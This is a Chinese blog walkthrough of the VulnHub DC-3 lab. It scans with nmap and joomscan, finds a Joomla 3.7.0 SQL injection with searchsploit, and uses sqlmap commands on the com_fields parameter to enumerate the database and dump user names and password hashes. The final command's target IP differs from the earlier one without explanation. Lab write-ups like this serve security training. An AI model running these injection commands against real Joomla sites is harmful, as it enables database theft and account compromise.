vulnhub靶场-DC3练习 - 骁隆's Blog

https://www.vulnhub.com/entry/dc-32,312/

这个靶场导入VM的时候需要把CD移除了，不然不能导入

先找靶机ip

1	`nmap -sP 192.168.70.0/24`

192.168.70.55

有网站

看一下端口

1	`nmap -A 192.168.70.55`

只开了80

显示CMS是Joomla

有一个专门扫描Jommla的扫描器叫joomscan

在kali里面装

1	`apt-ge install joomscan`

运行

1	`joomscan -u 192.168.70.55`

跑出了版本，目录和后台

后台的账号密码不知道，爆破试了一下不行，找一下joomla的漏洞，因为知道版本了

直接用searchsploit搜索

1	`searchsploit joomla 3.7.0`

存在一个sql注入

通过这个命令把漏洞信息复制到当前文件夹

1	`searchsploit -m 42033.txt`

里面写了利用方式

用sqlmap跑(把url改了就行)

mac上报错不知道怎么回事，直接用kali方便

1	`sqlmap -u "http://192.168.70.55/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]`

数据库出来了

先看一下当前数据库

1	`sqlmap -u "http://192.168.70.55/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]`

当前为joomladb数据库

1	`sqlmap -u "http://192.168.70.55/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]`

出来了很多，直接找到users表

查字段

sqlmap -u "http://192.168.70.55/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

因为是爆破的，我们这里选择默认字典爆破，设置如下图（先输y再输1再输10)

得到字段

接着跑账号密码

sqlmap -u "http://192.168.233.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]